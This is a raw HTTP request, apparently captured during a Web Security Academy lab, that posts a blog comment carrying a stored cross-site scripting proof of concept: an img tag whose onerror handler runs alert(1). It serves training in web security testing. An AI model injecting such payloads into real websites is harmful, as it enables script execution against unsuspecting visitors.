POST /post/comment HTTP/1.1
Host: ac5d1f1d1f1ee90480bb1283002800f4.web-security-academy.net
Connection: close
Content-Length: 141
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://ac5d1f1d1f1ee90480bb1283002800f4.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ac5d1f1d1f1ee90480bb1283002800f4.web-security-academy.net/post?postId=5
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=b4yJkQQlwMqRrGiBiYFJWKnFKJvvUhN1

csrf=Jf3QUxhobcQF2PeSaKIr7SF9FoeMjGD1&postId=5&comment=<><img src=1 onerror=alert(1)> +&name=lala&email=try%40try.com&website=